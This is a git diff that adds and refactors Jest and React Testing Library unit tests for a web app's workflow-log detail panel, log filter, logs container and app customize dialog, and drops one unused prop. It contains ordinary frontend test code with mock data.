to be fully rendered + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.title')).toBeInTheDocument() + }) + + // Find the close button by navigating from the heading to the close icon + // The close icon is an SVG inside a sibling div of the title + const heading = screen.getByRole('heading', { name: /customize\.title/i }) + const closeIcon = heading.parentElement!.querySelector('svg') + + // Assert - closeIcon must exist for the test to be valid + expect(closeIcon).toBeInTheDocument() + fireEvent.click(closeIcon!) + expect(onClose).toHaveBeenCalledTimes(1) + }) + }) + + // Edge cases tests - verify component handles boundary conditions + describe('Edge Cases', () => { + it('should handle empty appId', async () => { + // Arrange + const props = { ...defaultProps, appId: '' } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_APP_ID=\'\'') + }) + }) + + it('should handle empty api_base_url', async () => { + // Arrange + const props = { ...defaultProps, api_base_url: '' } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_API_URL=\'\'') + }) + }) + + it('should handle special characters in appId', async () => { + // Arrange + const specialAppId = 'app-id-with-special-chars_123' + const props = { ...defaultProps, appId: specialAppId } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_APP_ID='${specialAppId}'`) + }) + }) + + it('should handle URL with special characters in api_base_url', async () => { + // Arrange + const specialApiUrl = 'https://api.example.com:8080/v1' + const props = { ...defaultProps, api_base_url: specialApiUrl } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_API_URL='${specialApiUrl}'`) + }) + }) + }) + + // StepNum component tests - verify step number styling + describe('StepNum component', () => { + it('should render step numbers with correct styling class', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - The StepNum component is the direct container of the text + await waitFor(() => { + const stepNumber1 = screen.getByText('1') + expect(stepNumber1).toHaveClass('rounded-2xl') + }) + }) + }) + + // GithubIcon component tests - verify GitHub icon renders correctly + describe('GithubIcon component', () => { + it('should render GitHub icon SVG within GitHub link button', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Find GitHub link and verify it contains an SVG icon with expected class + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + const githubIcon = githubLink.querySelector('svg') + expect(githubIcon).toBeInTheDocument() + expect(githubIcon).toHaveClass('text-text-secondary') + }) + }) + }) +}) diff --git a/web/app/components/app/overview/customize/index.tsx b/web/app/components/app/overview/customize/index.tsx index e440a8cf26..698bc98efd 100644 --- a/web/app/components/app/overview/customize/index.tsx +++ b/web/app/components/app/overview/customize/index.tsx @@ -12,7 +12,6 @@ import Tag from '@/app/components/base/tag' type IShareLinkProps = { isShow: boolean onClose: () => void - linkUrl: string api_base_url: string appId: string mode: AppModeEnum diff --git a/web/app/components/app/workflow-log/detail.spec.tsx b/web/app/components/app/workflow-log/detail.spec.tsx new file mode 100644 index 0000000000..b594be5f04 --- /dev/null +++ b/web/app/components/app/workflow-log/detail.spec.tsx @@ -0,0 +1,319 @@ +/** + * DetailPanel Component Tests + * + * Tests the workflow run detail panel which displays: + * - Workflow run title + * - Replay button (when canReplay is true) + * - Close button + * - Run component with detail/tracing URLs + */ + +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import DetailPanel from './detail' +import { useStore as useAppStore } from '@/app/components/app/store' +import type { App, AppIconType, AppModeEnum } from '@/types/app' + +// ============================================================================ +// Mocks +// ============================================================================ + +const mockRouterPush = jest.fn() +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockRouterPush, + }), +})) + +// Mock the Run component as it has complex dependencies +jest.mock('@/app/components/workflow/run', () => ({ + __esModule: true, + default: ({ runDetailUrl, tracingListUrl }: { runDetailUrl: string; tracingListUrl: string }) => ( +
+ {runDetailUrl} + {tracingListUrl} +
+ ), +})) + +// Mock WorkflowContextProvider +jest.mock('@/app/components/workflow/context', () => ({ + WorkflowContextProvider: ({ children }: { children: React.ReactNode }) => ( +
{children}
+ ), +})) + +// Mock ahooks for useBoolean (used by TooltipPlus) +jest.mock('ahooks', () => ({ + useBoolean: (initial: boolean) => { + const setters = { + setTrue: jest.fn(), + setFalse: jest.fn(), + toggle: jest.fn(), + } + return [initial, setters] as const + }, +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createMockApp = (overrides: Partial = {}): App => ({ + id: 'test-app-id', + name: 'Test App', + description: 'Test app description', + author_name: 'Test Author', + icon_type: 'emoji' as AppIconType, + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + use_icon_as_answer_icon: false, + mode: 'workflow' as AppModeEnum, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as App['model_config'], + app_model_config: {} as App['app_model_config'], + created_at: Date.now(), + updated_at: Date.now(), + site: { + access_token: 'token', + app_base_url: 'https://example.com', + } as App['site'], + api_base_url: 'https://api.example.com', + tags: [], + access_mode: 'public_access' as App['access_mode'], + ...overrides, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('DetailPanel', () => { + const defaultOnClose = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + useAppStore.setState({ appDetail: createMockApp() }) + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { + render() + + expect(screen.getByText('appLog.runDetail.workflowTitle')).toBeInTheDocument() + }) + + it('should render workflow title', () => { + render() + + expect(screen.getByText('appLog.runDetail.workflowTitle')).toBeInTheDocument() + }) + + it('should render close button', () => { + const { container } = render() + + // Close button has RiCloseLine icon + const closeButton = container.querySelector('span.cursor-pointer') + expect(closeButton).toBeInTheDocument() + }) + + it('should render Run component with correct URLs', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'app-456' }) }) + + render() + + expect(screen.getByTestId('workflow-run')).toBeInTheDocument() + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/app-456/workflow-runs/run-789') + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('/apps/app-456/workflow-runs/run-789/node-executions') + }) + + it('should render WorkflowContextProvider wrapper', () => { + render() + + expect(screen.getByTestId('workflow-context-provider')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Props Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Props', () => { + it('should not render replay button when canReplay is false (default)', () => { + render() + + expect(screen.queryByRole('button', { name: 'appLog.runDetail.testWithParams' })).not.toBeInTheDocument() + }) + + it('should render replay button when canReplay is true', () => { + render() + + expect(screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' })).toBeInTheDocument() + }) + + it('should use empty URL when runID is empty', () => { + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('') + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('') + }) + }) + + // -------------------------------------------------------------------------- + // User Interactions + // -------------------------------------------------------------------------- + describe('User Interactions', () => { + it('should call onClose when close button is clicked', async () => { + const user = userEvent.setup() + const onClose = jest.fn() + + const { container } = render() + + const closeButton = container.querySelector('span.cursor-pointer') + expect(closeButton).toBeInTheDocument() + + await user.click(closeButton!) + + expect(onClose).toHaveBeenCalledTimes(1) + }) + + it('should navigate to workflow page with replayRunId when replay button is clicked', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-replay-test' }) }) + + render() + + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + await user.click(replayButton) + + expect(mockRouterPush).toHaveBeenCalledWith('/app/app-replay-test/workflow?replayRunId=run-to-replay') + }) + + it('should not navigate when replay clicked but appDetail is missing', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: undefined }) + + render() + + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + await user.click(replayButton) + + expect(mockRouterPush).not.toHaveBeenCalled() + }) + }) + + // -------------------------------------------------------------------------- + // URL Generation Tests + // -------------------------------------------------------------------------- + describe('URL Generation', () => { + it('should generate correct run detail URL', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'my-app' }) }) + + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/my-app/workflow-runs/my-run') + }) + + it('should generate correct tracing list URL', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'my-app' }) }) + + render() + + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('/apps/my-app/workflow-runs/my-run/node-executions') + }) + + it('should handle special characters in runID', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'app-id' }) }) + + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/app-id/workflow-runs/run-with-special-123') + }) + }) + + // -------------------------------------------------------------------------- + // Store Integration Tests + // -------------------------------------------------------------------------- + describe('Store Integration', () => { + it('should read appDetail from store', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'store-app-id' }) }) + + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/store-app-id/workflow-runs/run-123') + }) + + it('should handle undefined appDetail from store gracefully', () => { + useAppStore.setState({ appDetail: undefined }) + + render() + + // Run component should still render but with undefined in URL + expect(screen.getByTestId('workflow-run')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle empty runID', () => { + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('') + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('') + }) + + it('should handle very long runID', () => { + const longRunId = 'a'.repeat(100) + useAppStore.setState({ appDetail: createMockApp({ id: 'app-id' }) }) + + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent(`/apps/app-id/workflow-runs/${longRunId}`) + }) + + it('should render replay button with correct aria-label', () => { + render() + + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + expect(replayButton).toHaveAttribute('aria-label', 'appLog.runDetail.testWithParams') + }) + + it('should maintain proper component structure', () => { + const { container } = render() + + // Check for main container with flex layout + const mainContainer = container.querySelector('.flex.grow.flex-col') + expect(mainContainer).toBeInTheDocument() + + // Check for header section + const header = container.querySelector('.flex.items-center.bg-components-panel-bg') + expect(header).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Tooltip Tests + // -------------------------------------------------------------------------- + describe('Tooltip', () => { + it('should have tooltip on replay button', () => { + render() + + // The replay button should be wrapped in TooltipPlus + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + expect(replayButton).toBeInTheDocument() + + // TooltipPlus wraps the button with popupContent + // We verify the button exists with the correct aria-label + expect(replayButton).toHaveAttribute('type', 'button') + }) + }) +}) diff --git a/web/app/components/app/workflow-log/filter.spec.tsx b/web/app/components/app/workflow-log/filter.spec.tsx new file mode 100644 index 0000000000..d7bec41224 --- /dev/null +++ b/web/app/components/app/workflow-log/filter.spec.tsx @@ -0,0 +1,527 @@ +/** + * Filter Component Tests + * + * Tests the workflow log filter component which provides: + * - Status filtering (all, succeeded, failed, stopped, partial-succeeded) + * - Time period selection + * - Keyword search + */ + +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import Filter, { TIME_PERIOD_MAPPING } from './filter' +import type { QueryParam } from './index' + +// ============================================================================ +// Mocks +// ============================================================================ + +const mockTrackEvent = jest.fn() +jest.mock('@/app/components/base/amplitude/utils', () => ({ + trackEvent: (...args: unknown[]) => mockTrackEvent(...args), +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createDefaultQueryParams = (overrides: Partial = {}): QueryParam => ({ + status: 'all', + period: '2', // default to last 7 days + ...overrides, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('Filter', () => { + const defaultSetQueryParams = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { + render( + , + ) + + // Should render status chip, period chip, and search input + expect(screen.getByText('All')).toBeInTheDocument() + expect(screen.getByPlaceholderText('common.operation.search')).toBeInTheDocument() + }) + + it('should render all filter components', () => { + render( + , + ) + + // Status chip + expect(screen.getByText('All')).toBeInTheDocument() + // Period chip (shows translated key) + expect(screen.getByText('appLog.filter.period.last7days')).toBeInTheDocument() + // Search input + expect(screen.getByPlaceholderText('common.operation.search')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Status Filter Tests + // -------------------------------------------------------------------------- + describe('Status Filter', () => { + it('should display current status value', () => { + render( + , + ) + + // Chip should show Success for succeeded status + expect(screen.getByText('Success')).toBeInTheDocument() + }) + + it('should open status dropdown when clicked', async () => { + const user = userEvent.setup() + + render( + , + ) + + await user.click(screen.getByText('All')) + + // Should show all status options + await waitFor(() => { + expect(screen.getByText('Success')).toBeInTheDocument() + expect(screen.getByText('Fail')).toBeInTheDocument() + expect(screen.getByText('Stop')).toBeInTheDocument() + expect(screen.getByText('Partial Success')).toBeInTheDocument() + }) + }) + + it('should call setQueryParams when status is selected', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Success')) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'succeeded', + period: '2', + }) + }) + + it('should track status selection event', async () => { + const user = userEvent.setup() + + render( + , + ) + + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Fail')) + + expect(mockTrackEvent).toHaveBeenCalledWith( + 'workflow_log_filter_status_selected', + { workflow_log_filter_status: 'failed' }, + ) + }) + + it('should reset to all when status is cleared', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + const { container } = render( + , + ) + + // Find the clear icon (div with group/clear class) in the status chip + const clearIcon = container.querySelector('.group\\/clear') + + expect(clearIcon).toBeInTheDocument() + await user.click(clearIcon!) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '2', + }) + }) + + test.each([ + ['all', 'All'], + ['succeeded', 'Success'], + ['failed', 'Fail'], + ['stopped', 'Stop'], + ['partial-succeeded', 'Partial Success'], + ])('should display correct label for %s status', (statusValue, expectedLabel) => { + render( + , + ) + + expect(screen.getByText(expectedLabel)).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Time Period Filter Tests + // -------------------------------------------------------------------------- + describe('Time Period Filter', () => { + it('should display current period value', () => { + render( + , + ) + + expect(screen.getByText('appLog.filter.period.today')).toBeInTheDocument() + }) + + it('should open period dropdown when clicked', async () => { + const user = userEvent.setup() + + render( + , + ) + + await user.click(screen.getByText('appLog.filter.period.last7days')) + + // Should show all period options + await waitFor(() => { + expect(screen.getByText('appLog.filter.period.today')).toBeInTheDocument() + expect(screen.getByText('appLog.filter.period.last4weeks')).toBeInTheDocument() + expect(screen.getByText('appLog.filter.period.last3months')).toBeInTheDocument() + expect(screen.getByText('appLog.filter.period.allTime')).toBeInTheDocument() + }) + }) + + it('should call setQueryParams when period is selected', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('appLog.filter.period.last7days')) + await user.click(await screen.findByText('appLog.filter.period.allTime')) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '9', + }) + }) + + it('should reset period to allTime when cleared', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + // Find the period chip's clear button + const periodChip = screen.getByText('appLog.filter.period.last7days').closest('div') + const clearButton = periodChip?.querySelector('button[type="button"]') + + if (clearButton) { + await user.click(clearButton) + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '9', + }) + } + }) + }) + + // -------------------------------------------------------------------------- + // Keyword Search Tests + // -------------------------------------------------------------------------- + describe('Keyword Search', () => { + it('should display current keyword value', () => { + render( + , + ) + + expect(screen.getByDisplayValue('test search')).toBeInTheDocument() + }) + + it('should call setQueryParams when typing in search', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + await user.type(input, 'workflow') + + // Should call setQueryParams for each character typed + expect(setQueryParams).toHaveBeenLastCalledWith( + expect.objectContaining({ keyword: 'workflow' }), + ) + }) + + it('should clear keyword when clear button is clicked', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + const { container } = render( + , + ) + + // The Input component renders a clear icon div inside the input wrapper + // when showClearIcon is true and value exists + const inputWrapper = container.querySelector('.w-\\[200px\\]') + + // Find the clear icon div (has cursor-pointer class and contains RiCloseCircleFill) + const clearIconDiv = inputWrapper?.querySelector('div.cursor-pointer') + + expect(clearIconDiv).toBeInTheDocument() + await user.click(clearIconDiv!) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '2', + keyword: '', + }) + }) + + it('should update on direct input change', () => { + const setQueryParams = jest.fn() + + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + fireEvent.change(input, { target: { value: 'new search' } }) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '2', + keyword: 'new search', + }) + }) + }) + + // -------------------------------------------------------------------------- + // TIME_PERIOD_MAPPING Tests + // -------------------------------------------------------------------------- + describe('TIME_PERIOD_MAPPING', () => { + it('should have correct mapping for today', () => { + expect(TIME_PERIOD_MAPPING['1']).toEqual({ value: 0, name: 'today' }) + }) + + it('should have correct mapping for last 7 days', () => { + expect(TIME_PERIOD_MAPPING['2']).toEqual({ value: 7, name: 'last7days' }) + }) + + it('should have correct mapping for last 4 weeks', () => { + expect(TIME_PERIOD_MAPPING['3']).toEqual({ value: 28, name: 'last4weeks' }) + }) + + it('should have correct mapping for all time', () => { + expect(TIME_PERIOD_MAPPING['9']).toEqual({ value: -1, name: 'allTime' }) + }) + + it('should have all 9 predefined time periods', () => { + expect(Object.keys(TIME_PERIOD_MAPPING)).toHaveLength(9) + }) + + test.each([ + ['1', 'today', 0], + ['2', 'last7days', 7], + ['3', 'last4weeks', 28], + ['9', 'allTime', -1], + ])('TIME_PERIOD_MAPPING[%s] should have name=%s and correct value', (key, name, expectedValue) => { + const mapping = TIME_PERIOD_MAPPING[key] + expect(mapping.name).toBe(name) + if (expectedValue >= 0) + expect(mapping.value).toBe(expectedValue) + else + expect(mapping.value).toBe(-1) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle undefined keyword gracefully', () => { + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + expect(input).toHaveValue('') + }) + + it('should handle empty string keyword', () => { + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + expect(input).toHaveValue('') + }) + + it('should preserve other query params when updating status', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Success')) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'succeeded', + period: '3', + keyword: 'test', + }) + }) + + it('should preserve other query params when updating period', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('appLog.filter.period.last7days')) + await user.click(await screen.findByText('appLog.filter.period.today')) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'failed', + period: '1', + keyword: 'test', + }) + }) + + it('should preserve other query params when updating keyword', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + await user.type(input, 'a') + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'failed', + period: '3', + keyword: 'a', + }) + }) + }) + + // -------------------------------------------------------------------------- + // Integration Tests + // -------------------------------------------------------------------------- + describe('Integration', () => { + it('should render with all filters visible simultaneously', () => { + render( + , + ) + + expect(screen.getByText('Success')).toBeInTheDocument() + expect(screen.getByText('appLog.filter.period.today')).toBeInTheDocument() + expect(screen.getByDisplayValue('integration test')).toBeInTheDocument() + }) + + it('should have proper layout with flex and gap', () => { + const { container } = render( + , + ) + + const filterContainer = container.firstChild as HTMLElement + expect(filterContainer).toHaveClass('flex') + expect(filterContainer).toHaveClass('flex-row') + expect(filterContainer).toHaveClass('gap-2') + }) + }) +}) diff --git a/web/app/components/app/workflow-log/index.spec.tsx b/web/app/components/app/workflow-log/index.spec.tsx index 2ac9113a8e..e6d9f37949 100644 --- a/web/app/components/app/workflow-log/index.spec.tsx +++ b/web/app/components/app/workflow-log/index.spec.tsx @@ -1,105 +1,60 @@ -import React from 'react' +/** + * Logs Container Component Tests + * + * Tests the main Logs container component which: + * - Fetches workflow logs via useSWR + * - Manages query parameters (status, period, keyword) + * - Handles pagination + * - Renders Filter, List, and Empty states + * + * Note: Individual component tests are in their respective spec files: + * - filter.spec.tsx + * - list.spec.tsx + * - detail.spec.tsx + * - trigger-by-display.spec.tsx + */ + import { render, screen, waitFor } from '@testing-library/react' import userEvent from '@testing-library/user-event' import useSWR from 'swr' - -// Import real components for integration testing -import Logs from './index' -import type { ILogsProps, QueryParam } from './index' -import Filter, { TIME_PERIOD_MAPPING } from './filter' -import WorkflowAppLogList from './list' -import TriggerByDisplay from './trigger-by-display' -import DetailPanel from './detail' - -// Import types from source +import Logs, { type ILogsProps } from './index' +import { TIME_PERIOD_MAPPING } from './filter' import type { App, AppIconType, AppModeEnum } from '@/types/app' -import type { TriggerMetadata, WorkflowAppLogDetail, WorkflowLogsResponse, WorkflowRunDetail } from '@/models/log' +import type { WorkflowAppLogDetail, WorkflowLogsResponse, WorkflowRunDetail } from '@/models/log' import { WorkflowRunTriggeredFrom } from '@/models/log' import { APP_PAGE_LIMIT } from '@/config' -import { Theme } from '@/types/app' -// Mock external dependencies only +// ============================================================================ +// Mocks +// ============================================================================ + jest.mock('swr') + jest.mock('ahooks', () => ({ - useDebounce: (value: T): T => value, -})) -jest.mock('@/service/log', () => ({ - fetchWorkflowLogs: jest.fn(), -})) -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - t: (key: string) => key, - }), -})) -jest.mock('@/context/app-context', () => ({ - useAppContext: () => ({ - userProfile: { - timezone: 'UTC', - }, - }), + useDebounce: (value: T) => value, + useDebounceFn: (fn: (value: string) => void) => ({ run: fn }), + useBoolean: (initial: boolean) => { + const setters = { + setTrue: jest.fn(), + setFalse: jest.fn(), + toggle: jest.fn(), + } + return [initial, setters] as const + }, })) -// Router mock with trackable push function -const mockRouterPush = jest.fn() jest.mock('next/navigation', () => ({ useRouter: () => ({ - push: mockRouterPush, + push: jest.fn(), }), })) -jest.mock('@/hooks/use-theme', () => ({ +jest.mock('next/link', () => ({ __esModule: true, - default: () => ({ theme: Theme.light }), -})) -jest.mock('@/hooks/use-timestamp', () => ({ - __esModule: true, - default: () => ({ - formatTime: (timestamp: number, _format: string) => new Date(timestamp).toISOString(), - }), -})) -jest.mock('@/hooks/use-breakpoints', () => ({ - __esModule: true, - default: () => 'pc', - MediaType: { mobile: 'mobile', pc: 'pc' }, + default: ({ children, href }: { children: React.ReactNode; href: string }) => {children}, })) -// Store mock with configurable appDetail -let mockAppDetail: App | null = null -jest.mock('@/app/components/app/store', () => ({ - useStore: (selector: (state: { appDetail: App | null }) => App | null) => { - return selector({ appDetail: mockAppDetail }) - }, -})) - -// Mock portal-based components (they need DOM portal which is complex in tests) -let mockPortalOpen = false -jest.mock('@/app/components/base/portal-to-follow-elem', () => ({ - PortalToFollowElem: ({ children, open }: { children: React.ReactNode; open: boolean }) => { - mockPortalOpen = open - return
{children}
- }, - PortalToFollowElemTrigger: ({ children, onClick }: { children: React.ReactNode; onClick?: () => void }) => ( -
{children}
- ), - PortalToFollowElemContent: ({ children }: { children: React.ReactNode }) => ( - mockPortalOpen ?
{children}
: null - ), -})) - -// Mock Drawer for List component (uses headlessui Dialog) -jest.mock('@/app/components/base/drawer', () => ({ - __esModule: true, - default: ({ isOpen, onClose, children }: { isOpen: boolean; onClose: () => void; children: React.ReactNode }) => ( - isOpen ? ( -
- - {children} -
- ) : null - ), -})) - -// Mock only the complex workflow Run component - DetailPanel itself is tested with real code +// Mock the Run component to avoid complex dependencies jest.mock('@/app/components/workflow/run', () => ({ __esModule: true, default: ({ runDetailUrl, tracingListUrl }: { runDetailUrl: string; tracingListUrl: string }) => ( @@ -110,105 +65,58 @@ jest.mock('@/app/components/workflow/run', () => ({ ), })) -// Mock WorkflowContextProvider - provides context for Run component -jest.mock('@/app/components/workflow/context', () => ({ - WorkflowContextProvider: ({ children }: { children: React.ReactNode }) => ( -
{children}
- ), -})) - -// Mock TooltipPlus - simple UI component -jest.mock('@/app/components/base/tooltip', () => ({ - __esModule: true, - default: ({ children, popupContent }: { children: React.ReactNode; popupContent: string }) => ( -
{children}
- ), -})) - -// Mock base components that are difficult to render -jest.mock('@/app/components/app/log/empty-element', () => ({ - __esModule: true, - default: ({ appDetail }: { appDetail: App }) => ( -
No logs for {appDetail.name}
- ), -})) - -jest.mock('@/app/components/base/pagination', () => ({ - __esModule: true, - default: ({ - current, - onChange, - total, - limit, - onLimitChange, - }: { - current: number - onChange: (page: number) => void - total: number - limit: number - onLimitChange: (limit: number) => void - }) => ( -
- {current} - {total} - {limit} - - - -
- ), -})) - -jest.mock('@/app/components/base/loading', () => ({ - __esModule: true, - default: ({ type }: { type?: string }) => ( -
Loading...
- ), -})) - -// Mock amplitude tracking - with trackable function const mockTrackEvent = jest.fn() jest.mock('@/app/components/base/amplitude/utils', () => ({ trackEvent: (...args: unknown[]) => mockTrackEvent(...args), })) -// Mock workflow icons -jest.mock('@/app/components/base/icons/src/vender/workflow', () => ({ - Code: () => Code, - KnowledgeRetrieval: () => Knowledge, - Schedule: () => Schedule, - WebhookLine: () => Webhook, - WindowCursor: () => Window, +jest.mock('@/service/log', () => ({ + fetchWorkflowLogs: jest.fn(), })) +jest.mock('@/hooks/use-theme', () => ({ + __esModule: true, + default: () => { + const { Theme } = require('@/types/app') + return { theme: Theme.light } + }, +})) + +jest.mock('@/context/app-context', () => ({ + useAppContext: () => ({ + userProfile: { timezone: 'UTC' }, + }), +})) + +// Mock useTimestamp +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: (timestamp: number, _format: string) => `formatted-${timestamp}`, + }), +})) + +// Mock useBreakpoints +jest.mock('@/hooks/use-breakpoints', () => ({ + __esModule: true, + default: () => 'pc', + MediaType: { + mobile: 'mobile', + pc: 'pc', + }, +})) + +// Mock BlockIcon jest.mock('@/app/components/workflow/block-icon', () => ({ __esModule: true, - default: ({ type, toolIcon }: { type: string; size?: string; toolIcon?: string }) => ( - BlockIcon - ), + default: () =>
BlockIcon
, })) -// Mock workflow types - must include all exports used by config/index.ts -jest.mock('@/app/components/workflow/types', () => ({ - BlockEnum: { - TriggerPlugin: 'trigger-plugin', - }, - InputVarType: { - textInput: 'text-input', - paragraph: 'paragraph', - select: 'select', - number: 'number', - checkbox: 'checkbox', - url: 'url', - files: 'files', - json: 'json', - jsonObject: 'json_object', - contexts: 'contexts', - iterator: 'iterator', - singleFile: 'file', - multiFiles: 'file-list', - loop: 'loop', - }, +// Mock WorkflowContextProvider +jest.mock('@/app/components/workflow/context', () => ({ + WorkflowContextProvider: ({ children }: { children: React.ReactNode }) => ( +
{children}
+ ), })) const mockedUseSWR = useSWR as jest.MockedFunction @@ -237,7 +145,10 @@ const createMockApp = (overrides: Partial = {}): App => ({ app_model_config: {} as App['app_model_config'], created_at: Date.now(), updated_at: Date.now(), - site: {} as App['site'], + site: { + access_token: 'token', + app_base_url: 'https://example.com', + } as App['site'], api_base_url: 'https://api.example.com', tags: [], access_mode: 'public_access' as App['access_mode'], @@ -274,7 +185,7 @@ const createMockWorkflowLog = (overrides: Partial = {}): W const createMockLogsResponse = ( data: WorkflowAppLogDetail[] = [], - total = 0, + total = data.length, ): WorkflowLogsResponse => ({ data, has_more: data.length < total, @@ -284,919 +195,23 @@ const createMockLogsResponse = ( }) // ============================================================================ -// Integration Tests for Logs (Main Component) +// Tests // ============================================================================ -describe('Workflow Log Module Integration Tests', () => { +describe('Logs Container', () => { const defaultProps: ILogsProps = { appDetail: createMockApp(), } beforeEach(() => { jest.clearAllMocks() - mockPortalOpen = false - mockAppDetail = createMockApp() - mockRouterPush.mockClear() - mockTrackEvent.mockClear() }) - // Tests for Logs container component - orchestrates Filter, List, Pagination, and Loading states - describe('Logs Container', () => { - describe('Rendering', () => { - it('should render title, subtitle, and filter component', () => { - // Arrange - mockedUseSWR.mockReturnValue({ - data: createMockLogsResponse([], 0), - mutate: jest.fn(), - isValidating: false, - isLoading: false, - error: undefined, - }) - - // Act - render() - - // Assert - expect(screen.getByText('appLog.workflowTitle')).toBeInTheDocument() - expect(screen.getByText('appLog.workflowSubtitle')).toBeInTheDocument() - // Filter should render (has Chip components for status/period and Input for keyword) - expect(screen.getByPlaceholderText('common.operation.search')).toBeInTheDocument() - }) - }) - - describe('Loading State', () => { - it('should show loading spinner when data is undefined', () => { - // Arrange - mockedUseSWR.mockReturnValue({ - data: undefined, - mutate: jest.fn(), - isValidating: true, - isLoading: true, - error: undefined, - }) - - // Act - render() - - // Assert - expect(screen.getByTestId('loading')).toBeInTheDocument() - expect(screen.queryByTestId('empty-element')).not.toBeInTheDocument() - }) - }) - - describe('Empty State', () => { - it('should show empty element when total is 0', () => { - // Arrange - 